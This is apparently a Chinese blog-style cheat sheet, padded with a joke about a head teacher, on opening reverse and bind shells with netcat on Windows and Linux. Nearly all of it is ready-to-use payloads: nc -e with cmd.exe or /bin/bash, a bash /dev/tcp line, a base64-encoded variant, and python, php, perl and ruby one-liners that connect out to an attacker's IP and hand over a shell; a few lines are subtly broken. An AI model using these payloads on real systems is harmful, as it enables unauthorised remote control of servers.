Windows/Linux 下nc 反弹shell
高二那年班主任对我们说:其实我并不反对你们谈恋爱,
只是你们记得要找一个有担当的,
那些一看见老师就松开你手的,要来有什么用?
NC概述:
-
nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。
-
何为反弹shell?为什么不反弹攻击?
相信你有一天可以直接把所有攻击反弹回去的. -
何为反弹shell?
简单来说就是我们监听,然后把服务器的一个shell反弹回来,然后我们可以在自己电脑终端控制服务器终端。
windows:
主要分为正向反向连接
1:正向连接
服务器执行:nc -l -p 8888 -e cmd.exe
本地主机执行:nc -vv 服务器ip 8888
2:反向连接
服务器执行:nc -e cmd.exe 公网ip 8888
公网主机执行:nc -lvp 8888
即可成功反弹shell
linux:
本地需要监听
nc -lvp 4444
各种环境不同,可以结合天时地利人和。
- Bash
bash -i >& /dev/tcp/ip/port 0>&1
base64版
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzUvNzg5MCAwPiYx|{base64,-d}|{bash,-i}'
- python
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
- php
php -r '$sock=fsockopen("ip",port);exec("/bin/sh -i <&3 >&3 2>&3");'
php- 'exec("/bin/bash -i >& /dev/tcp/ip/port")'
- perl
Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
- ruby
ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
- nc反弹nc
nc -e /bin/bash ip port
成功反弹shll
余生很长,请多指教。
